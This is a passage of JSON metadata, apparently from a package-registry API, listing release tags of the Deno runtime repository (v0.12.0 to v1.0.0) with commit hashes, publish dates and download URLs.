f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v